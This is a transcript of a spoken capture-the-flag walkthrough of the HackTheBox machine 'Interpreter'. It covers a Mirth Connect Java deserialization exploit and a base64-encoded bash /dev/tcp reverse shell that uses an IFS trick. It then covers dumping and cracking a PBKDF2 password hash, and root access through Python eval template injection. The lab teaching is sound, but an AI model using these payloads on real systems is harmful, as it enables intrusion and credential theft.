What's going on YouTube? This is Ipsec, and today we'll be doing Interpreter from HackTheBox, which is a pretty straightforward box that starts off with a CVE exploiting Mirth Connect. I think the vulnerability is actually pretty interesting because it's a Java Deserialization vulnerability where we craft the gadget from XML. It just looks pretty cool. Anyways, that leads us to a shell on the box, and we can dump the database to reveal a hashed password, but it's stored in a little bit of an odd way. Looking at the source code reveals how we can convert this into a hashcat format that leads us access to another user. This user can read a Python script that's listening on a local socket. The vulnerability is really odd, but straightforward. They created their own templating engine that does like a triple F string. It sounds complicated, but it's pretty straightforward to enumerate and exploit. So with all that being said, let's just jump in. As always, we can start with an nmap. So -sc for default scripts, sv enumerate versions, -- reason. This will give us things like the TTL. OA output all formats, put in the nmap directory and call it interpreter. And then the IP address of 10.129.6.19. This can take some time to run, so I've already ran it. Looking at the results, we have just 3 ports open. The first one is SSH on port 22, and the banner tells us it's a Debian server. We also have HTTP on port 80. Its banner is not telling us the web server and outputting like everything as it did a regular network connection, which leads me to believe nmap doesn't have this like web server's user agent listed as HTTP, so it just does odd things, right? So we have like this fingerprinting a 404 request. I'm going to see what the user agent is in a second. We also have 443 open, and that looks to be it. So let's go ahead and see what this user agent is. So I'm going to do a curl-i. I think this is going to show headers. HTTP 10.129.6.19. There we go. And we see there is no server header. So I think that's why nmap kind of like went crazy there. Yeah, let's try HTTPS real quick. I'm going to add -k so we ignore SSL, make a request, and yes, there is no server header. So I think that's why nmap is behaving that way. But let's just go ahead and take a look at this web server. So I'm going to go to HTTPS. We can probably go to HTTP as well. It's probably both the same. Let's just go to HTTP just to make sure. Yes, it is. And I'm going to make a request to this full page. So let's just go ahead and do the same curl. I'm curious if we return a page, if we get anything else. There is no server header, but we have JSession ID. So we know this is going to be a Java web app, right? It is Mirth Connect Administrator. If we download the application here where it says launch Mirth Connect, I'm going to download it. That is a JNLP. That's some like weird Java technology that I don't think is really used that much anymore. What was that download name? Web start. Why did that not move? Okay. But whenever I see this, I always hate it because it's always a pain to open this type of stuff on Linux. But we don't really have to because we can see it's exposing the version right here, 4.4.0. And that is Mirth Connect. So if we search Google for Mirth Connect 4.4.0, I'm going to call it CVE, I guess. We could also go to like MITRE and things like that and search it, but this is probably the better resource. If we go here, this is going to be a 2023 CVE, which is a little bit old. Let's see, latest patch 441. It's not going to give us the actual vulnerability here, but it does give us a detection. And this is also going to leak the version. We got it out of the JNLP, but let's just go ahead and copy this and see what it looks like, right? So if I just do a curl, let's do HTTP 10.129.6.19. We get an error message, not found. So let's do HTTPS. Maybe there is a difference between HTTP and HTTPS. We got an error again, but this time it's a 400 error. And let's see, all requests must have X requested with. So that's a little bit odd, but let's add the header. And if we looked at that blog post, it does have that. I'm just going to call this pwn. It doesn't really matter what we call it. And it returns 440, right? We can see here they're doing X request with open API. But yeah, that is the testing the version. We found the version 2 different ways. If we go just to the API, so let's just go to /API. It's going to give us a Swagger looking like interface. Maybe it is Swagger right here. Yeah, Swagger documentation. of how to actually use this API. But let's go ahead and find that CVE again. I'm just going to go CVE 2023. Mirth Connect. What was the number? 43208. 43208. And there is a good write-up on Horizon AI again. Let's see if I can find it really quick. Horizon, next gen, maybe this. Yeah. So this is talking about it. They have, I guess, two vulnerabilities. One was like an incomplete patch. Let's see. I'm not going to get too far into the weeds, but I think this one, let's see, Mirth Connect 411 was vulnerable to Java Deserialization. It took this XML, and then we can see us building a like serialization string between Java Lang comparable to event handler to process builder to running a process. There was a patch that prevented us from loading like Java Lang process builder. I don't know exactly all the details there off the top of my head, but they find a different way to get code execution using, I want to say it was like Hibernate or something. But we can see common collections. Yeah, not Hibernate. Common collections, invoke transformer, and they find a different path to get RCE, right? When you ever like deserialize user input, you always have a huge like attack surface, especially with languages like Java. Python, I think it's a little bit safer as long as you're not using pickle. Like there's a way to do deserialization safe. I think protobuf is safe. Pickle is not safe. JSON's relatively safe most of the time, but Java definitely does suffer from deserialization attacks quite often. So let's go ahead and look at this proof of concept. I'm going to run this a little bit oddly because I don't want to run the payload and just get a shell. I want to do it like look at what it's building and then we'll manipulate it slightly. So I'm going to call this gen.py, paste this, just make sure we can run it. Awesome. Let's do a -u. I'm going to point to localhost. Let's just do 9001 and then -c, the command. I'm just going to do an ID command. So let me listen on 9001 so I can grab this payload. Awesome. I guess it showed me the payload. Let's see. Make the thing smaller. Copy. Why is that not? I can make my terminal smaller, but not bigger. That's weird, but let's just try creating a new tab. And that seems to have fixed it. Reopen tmux. Awesome. And then I'm going to do vpayload.text. Paste this just so we have it. And then we can go and look at this, right? So it makes a request to /users and sends this XML. So we can do this, post create a new user, and try it out. Paste our XML. And if we go to execute, we get a server error. I don't know if that is good or not. What I'm going to try is a ping first. So we'll do ping. And on Linux, I never remember if it's -c or -n. The flag on Windows and Linux are different. It is a C for Linux. And we want to go 10, 10, 14. I think I'm 179, 171. Awesome. Let's do a TCP dump. -i ton 0 ICMP. Make sure we run that with sudo. And I'm also going to add -n. So I did this to switch, like, maybe we don't get the output of the command. So this is going to be like a blind execution to see if we executed code. And we did, because we have one ping back and forth. So now we have a way to execute commands. Java deserialization is a little bit odd because we can't just do a straight reverse shell. We have to encode it because there's a lot of just bad characters. Now, the other odd thing is Java, for some reason, treats these quotes a little bit oddly. If you go to ipsec.rocks, I learned it from, we go to why so serial, like building a reverse shell payload that works with it. I go about all the details here. I don't fully remember exactly why. There is a why so serial -modified that kind of fixes it and talks about it. It is really old, so I'm not positive if it'll still be here. Yeah, so it talks about the issue. But essentially, because Java, I think, is pretty much not using these quotes, it breaks it. And we need those quotes normally for a reverse shell payload because we do bash-c to put it inside of bash. And then we do this so the command doesn't get delimited and each of these doesn't get treated as a new argument, right? We just want to pass one big string. We can't use quotes in Java, so what we do is end up replacing quotes with IFS. And this magically works because IFS by default is going to be a space. So we can get around that limitation. Now, the other thing is our bash reverse shell has a lot of bad characters by default. So we're going to use base64 to encode it to remove all of them. So let's just go with, I'm going to call it rev.text, I guess. It doesn't really matter, but I want to give it bash-i. And then, what is it? I got to type this out. Bash-c, bash-i, dev tcp 1010 14 171 9001. It's funny how my muscle memory works that I actually have to type it like that. And now that I'm thinking about it, do we have to? I just want this string. Yeah. I didn't need to create rev.text in hindsight, but oh well. Because we could have done that with an echo. But what I'm doing now is I want to get rid of any special character. And it's easier to do it as echoed in hindsight. Base4, W0. Let's do a -n. There we go. So we want to get rid of the space. That space is probably there. Awesome. And then we have a few equals at the end. That is just padding. So now we have a pure alphanumeric. Pluses sometimes get treated oddly in HTTP. So that's why I want to get rid of that. So we have this. So what I want to do is go back to here. And we're going to get rid of these quotes. And I'm going to do a echo. Then we say IFS -n IFS paste. Then base64 IFS -d and pipe to bash. And if we did this correctly, we will get a reverse shell, hopefully. So nc lvnp 9001. Let's go ahead and send this. And there it is. We have the shell. So let's fix our TTY. So I'll do python 3-c import pty. I need a space there. Pty, pty.spawn, bin bash. There we go. I'll do control Z to background it. stty raw minus echo, foreground, enter. And then I want to export term is equal to xterm, which will let me clear the screen. Awesome. So we landed on a web server. The first thing to do is try to find the database so we can start dumping things. I'm going to go in the config directory because that's normally where like configurations are stored. And then we can do lsla, and there is a mirth.properties. So let's go ahead and take a look at this. Let's see. We see database and database passwords. So right off the bat, we could. One thing I like doing though is just hiding comments and files. So we'll do a grep-v, anything that starts with a comment, and then we will do a grep period for things on the line, right? So we can see the database information. It talks to 3306 on localhost. The database name is mcbddprod. Let's see, is there anything else in this config? HTTP host. We have the key store. So if we don't get anything from the database, I'd probably start going into the key store that has normally like certificates, other things. We have the key store use passwords, so we could decrypt it if we wanted to, but most of the time the database is good. So let's do MySQL -u mirthdb. I also have to add -p for password. We will copy this, paste it in, and then I'm going to do show databases because I forgot the database name. Let's do use. We will just copy this. And now we can do show tables. I'm going to do a select star from person. I don't like the way that did. So I'm going to do \G, which is a weird thing in SQL, but this puts it in more of a human readable format. And we don't see really that much. We have the username, but nothing about passwords. So if I look back at the tables, there is a person_password. So let's do select star from person_password. And we have the password here. Now this looks like it's base64 encoded. So let's do an echo base64-D, and it's gibberish. So this is probably going to be some type of encryption. So at this point, we have to figure out exactly how this is stored. And Mirth Connect is open source. So if we do Mirth Connect GitHub, we can probably pull it, and then we will clone it down to our box. So we can do a git clone, because I don't think it's going to be trivial to just look at the source code through all these directory structures, because I don't know how Java is stored that well. Can we do controllers? We could. Normally, like in Java, I like looking at controller because that tells us where like the data classes and things like that are. We probably want default user controller. I guess we'll see if we can, how far we can go with this. Collapse that. So user controller, let's see. What do we have? Reset user status, get users, update user, check or update password. That sounds like it's probably going to be good. And let's see, digester. So we probably want to look at this. Can we easily get to this file? I do not know exactly how to. We can just go to this. What I would normally do is grep-i controller find.grep-i controller. Then we probably find the user controller here. And then what do we want? The digest. So we'll go back to that find digest. Let's see, that is probably going to be under, we got digest authenticator, probably digester.java. And let's see, what do we have here? So under the digester, we see the algorithm. This is going to be pbkdf2 with hmac SHA-256. So let's see if hashcat supports this. So I'm going to go to my Kraken where I have hashcat running, and I'm going to do /hashcat example hashes. And let's do grep, what is it? pbkdf. So pbkdf2. pbk. There we go. I'm going to do a grep on name because we don't care about example hash right now. We have a lot. We also wanted, was it SHA-256? So I'm just going to do a grep-i SHA-256. And that gets us down a lot. Let's see. We're not doing Cisco, not doing Django. Probably this, pbkdf2 hmac SHA-256. pbkdf2 hmac SHA-256. So this looks like a good starting point. So if we do a grep on that, and let's see, well, let's just do a less, and then we can search to get exactly what we want. Okay, so it's going to be hash mode 10900 probably. We have to get SHA-256. Then this is most likely going to be iteration. This is going to be the salt, and this is going to be the actual data. So that's what we want to get from this. The salt is looking like 8 characters, and the iteration is 600,000. So let's go back here. We can grab the password again, and we want to echo base64-D. So we have the payload. Now the salt is going to be 8 bytes, so it's probably going to be this. And then the encrypted password is going to be this, or I should say hash password because it's not encryption. So what we want to do is find a good way to just grab bytes out of this, right? And I like using head and tail for this. So I'm just going to do this as a quick demo. Let's do this. If I do tail -C3, it's going to get me the last 3 characters. Why did it only give me 2? Because I forgot the -N, so it counted the line break as 1. If I do this, a -N, there we go. We have the last 3. Now I can also use head, right? So that gets me 1, 2, 3 out of that. So we wanted the first 8. So there we go. So we can do this, and that's going to get us the salt. So let's go back to our base 64. And I'm going to do head -C8 because the salt was 8 bytes. And then we're going to base 64 again. And that is going to be the salt. It's kind of funny. Of course, it doesn't change much because this is base 64. So the salt looks very similar, right? This character is different because we have padding here. It's a D because it has more characters. So the padding doesn't matter, right? But that's going to be the salt. And now we just need the password. And we want to grab everything but the first 8, right? So let's go back to our command. So if we do a tail, there's also a plus command. So if we do tail +1, let's do +2. There we go. I guess +1 shows the whole string. So we always want to increment by 1, but our goal right here is to show, was that right? I think I just did it. Maybe it's plus, yeah, we want +9, right? Because we want to ignore these. So if we kept going on, so like A, B, C, D, E, F, that is always going to ignore the first 8 characters and give us everything afterwards. At least I think that's what it's doing. We'll see. Let's just go ahead and try this out. So instead of the head there, we're going to do tail -C +9. That's going to start us at the 9th character of this. And this is going to be the password. So if we cat the password, that's what it looks like. If we cat the salt, that's what it looks like. And what we have to get is this. So we'll do SHA-256:, then the iterations, which I think we said was 600,000. Yes, that's what it looks like. So 600,000. The salt is going to be this. Then the password is this. So I think we have recreated this password hash. So let's go ahead and copy this and 10900. So /hashcat -m 10900 word list opt word list rocku.txt. And then the hash file. Do I give it this? I'm actually blanking on how to use hashcat. Let's see. I think I can just do this for a word list. We'll see if this works. This is just shorthand for run this command, treat it as a file. And I just got to change the word list and that location. Opt word list rocku.txt. There we go. Hash file is empty or corrupt. Okay. Well, let's go ahead and create this file. That does not work apparently. I just want to see something real quick. Did I do this correctly? I think I did. Yeah. Oh well. V hashes interpreter. Paste this. And we can say hashes interpreter. Hopefully it starts cracking. There we go. Looks like it has started. How long does this say it's going to take? I don't see a time. Maybe I'm blind. That's very possible. up to 30 minutes. So I'm going to just pause the video real quick. It shouldn't take anywhere near that time. As long as we did all of this correct, as long as like this piece is, let's see, SHA. Should we just double check that really quick? I don't even know how we would double check that. Let's see. Let's go here real quick. I guess we can do this. So where is our tail plus C? Okay, so we said we wanted to grab everything skipping this. And we did not accomplish that. Where does 5973 start? This is the same payload. We have more. Something's not making sense. We did tails-c and we actually got more data. It cracked. I'm not exactly sure what I'm doing here. I wish I did not show that, but we did it correctly. That'll make more sense to me, I'm sure, right after I'm done recording and look over this. But looks like the password is snowflake1. So let's go ahead and look at the user again. So we'll do person. That is Sedric. So let's go ahead and try SSHing. So we do SSH 10.129. What is this IP of the box? 6.19. Sedric at 10.129.6.19. Allowed, paste, and we get logged in. Awesome. But this is really bothering me. What did we screw up? Let's see. We echo, we decode, we tail, we encode. Hold on. Invalid base 64. Of course. We don't have to touch base 64 again. That was our mistake. There we go. I think this is going to work. I don't know how I made that mistake. Let's see. Base 64-D XXD. This is the payload. This is us chopping off the first 8 bytes. Awesome. So we get rid of this and we start at 62C8. There we have it. So easy to screw up when we like do all this manually in Bash. Normally I would use like CyberChef or something like that and it would make it so much easier to see. But yeah, the mistake we did was like after we did this, we did base 64 and then did XXD, which of course adds length. So that all makes sense. I don't know what I was thinking, but let's go ahead and see what we have here as Sedric. So let's see what we have in our home directory. So I'm just going to find .-type F and just the flag. So we could also see what's just running on this box. And we see something on 3306, that's MySQL, 54321 on localhost. And then we missed port 661 on our nmap. This is going to be part of Mirth Connect. Not too important to look at it, but this is somewhat interesting. 54321. So let's go ahead and go into Etsy. We're going to grep for 54321, and we're going to hide error messages. So I think this is how. We need a period there and recursive. So just looking through all the files in Etsy for that, we don't have anything. So let's see. We could just look at PSEF grep 54321, see if it's leaked there. It's not. So let's do PSEF -- forest and start looking at processes. Okay, so let's see. Laurel is running. That is an oddity thing. VMware tools. We can see our reverse shell right here. Oddly enough, we have fail to ban. So that's interesting. see what else. We have this notif.py running as root. So let's go ahead and put this on a clipboard because that is definitely interesting. Anything else? No. So let's look at this file. So we'll do lsla on it. We can see it's root owned and the group Sedric can read it. If we just did a find dot dash group Sedric and again hide error messages, we need to do slash. This is a good way just to see like interesting files around your user. You will probably want to do a grep-v, and then let's hide things from sys. And you probably should know the find command better than me and put exclusions in. But if you're lazy, you just pipe it over to grep and do exclusions this way because this is easy. And there we go. We can see everything in the home directory, and then we have this notif.py. So let's go ahead and take a look at it. We don't have Vim. That's annoying. So let's see. Right off the bat, I see this big comment, which leads me to believe it's going to be AI generated. I don't know why. This is just, I guess, it's a normal way to do comments. It just looks odd to me. I don't know what about it. Maybe it's not AI. We don't have comments on each of these functions, but let's see. So we have template, and something that sticks out really odd. We see eval. So it is doing a double F string, I want to say. So we get F, double quote, then another F string, and then we're going to the template. So I guess we have like, we got like 3 F strings going on in this attack. Weird. So it looks like it's doing some type of template injection, I guess. So if we put a something in here, we get passed over to eval and we can get code execution most likely. Let's see, we have add patient. So that is going to be what calls this weird template. I don't understand it, but I think we can attack it. So let's see, we have to make a request to this port. It has to come from 127.0.0.1, and it is XML. So what I'm going to do real quick, let's just do a, to get into this SSH thing, if the first thing you type is this, it drops you into that prompt. And then I want to say, it's not going to be -D. I think it's a local port forward, right? So -L, I'm just going to call this, what port was it? Uh, 54321. 54321. Okay, so I think now I should be able to hit this port locally. Let's just exit this so we don't have it anymore. There we go. Curl 127.0.0.1. 54321. Awesome. So that's now going through my proxy. So let's do curl. Is it -x HTTP 127.0.0.1 8080? I want to get this going through Burp Suite so we can start playing with this easily. There we go. Did I send it to repeater? I didn't. I turned intercept off. Repeater. Okay. So what do we want to do? Let's go back into this, and we want to make a post request to add patient. So let's change the request method, add patient, XML error. So let's see, if we can't parse, we return XML error. So we want to give a patient tag, I guess. Still XML. That's XML text. Find patient, no patient. So I'm not exactly sure what's going on, but we're not even making it this far. So we are getting a parser error, and all we're doing is these two lines. So my guess is the way we're returning data does not put it in the right format here to decode it. We do application, as long as it's not URL form encode. Oh, that makes sense, because if it's URL form encoded, it's like expecting it to be like input is equal to, and that's probably where it's erroring. So as long as we give it some type, a different content type, it works just fine. I bet JSON will fail because it's expecting JSON data. Nope, JSON worked. I was expecting that to fail. But anything here seems to work. I'm just going to put XML because it is XML data. But it just can't be that xwww URL form encoded, because I'm guessing this is Flask was probably workzug on the back end or something like that, just parsing this data oddly. But now we have this XML. If patient's not there, we get something, but we know we need patient because that's what it's trying to go for. So we want to get first name, last name, sender app timestamp. This is annoying. First name. Then we want, was it last name? And these should all be one line. This needs to be a / last name. Okay. The next field is sender app. Sender app. I wonder if there's a better way to do this. Like I could just probably copy this string into Python and then have it output XML. That's probably a smarter way to go about it. Let's go timestamp. And again, my habit is always hitting enter and putting things on a new line. So birth underscore date and then gender. Birth date. And this could also, maybe if this doesn't work, I'm going to try like camel casing it or things like that. I know some serializations, like they treat these underscores oddly. But I think this should be fine. This all needs to be one line, I think. Invalid input. So first name, ABC, DEF. Sender app is something. Timestamp. Does it say, what do we do with timestamp? Let's see, timestamp. How are we using this? It's probably going to be here. Let's see, date time now, year of birth. 2026. 0101, maybe. Oh, that's probably birth date. I'm going to call it gender. Still have invalid input. We have something wrong. First name, last name, sender app. Find text tag. So patient, first name, last name, sender app, timestamp, birth date, gender. I definitely have everything. I must have like invalid data. It's saying invalid input, so of course. Let's see, invalid input. Where does this actually get raised? Over here. Oh, date of birth format is day, day, month, month, year, year, year. Okay. So we'll do 01, 01, 2026. Okay. Well, we got that done. What else do we have? Is sender app ever used? Sender. I don't think sender app is used. I think timestamp is the next thing that could be odd. Let's just make sure timestamp is an integer. Okay, that works. So our patient is this. That's fine. So let's see. What do we have? We're now in template. So we're doing an eval. So if we do gender is 1 + 1. Okay, that didn't work. Put it in single quotes. There we go. So now we have it actually doing this eval for us. So the next step is to try to like import a gadget. So let's go with __ import. And let's see, can we do OS? We have that in capitals. So the module is frozen. So that is good for us. So what we want to now do is call something out of OS. So that'll be like popen. So we can do os.processOpen. We'll say ID. And I think we call read. There we go. Now we have code execution. So if we did echo test here, we have invalid input, echo plus test. We got nothing. So we're having trouble right now with spaces. So space appears to be a bad character. I wonder if we can do like the IFS. We probably can't because this is Python, not Bash, right? So let's see. So we have to now get around not being able to do spaces. So again, like we did in the last one, we can base64 encode things. So if we do a process open, and then we say we'll import then base64, and then we want to do a B64 decode like this. I want to say, let's go ahead and echo -n ID base64 encode this. AWQ, that's going to be what ID is. Let's see. Decode. There we go. So now we have a way to put spaces in here, hopefully. So I'm just going to test this out with a echo -n, echo please subscribe. Let's end this quote. So if it says please subscribe is our gender, then we definitely have this right? There we go. So now let's get a shell. So let's just do echo -n. Do we have that? I don't have it still. Is it here? It is. Awesome. Whoops. Let's just go ahead and copy this. Copy this whole string. And then let's see. Let's just replace this with spaces again, because we can use spaces. That should be fine. Let's make sure there's no line breaks. Copy this. Let's go back to burp. Paste this in. Send it. It is hung because we have a shell. Awesome. So if we go to root, we can get root.txt. And that is going to be the box. There's one thing I want to look at really quick. As I was doing this, I was like, wait, did we even have to do that password cracking step? Because you can definitely see the port is open as the web user, right? So if we send a post request here, we get XML error. So if we give it bad XML, can we piece together errors? No patient tag found. So let's give it a patient. Invalid input. So, okay. There's no way for us to actually reverse this because the error message is not verbose. I was just wondering if we could just work through error messages building this XML payload, but you can't. You have to pretty much read that file, and only Sedric can read that file. So with that being said, that's going to be the box. Hope you guys enjoyed it. Take care, and I will see you all next time.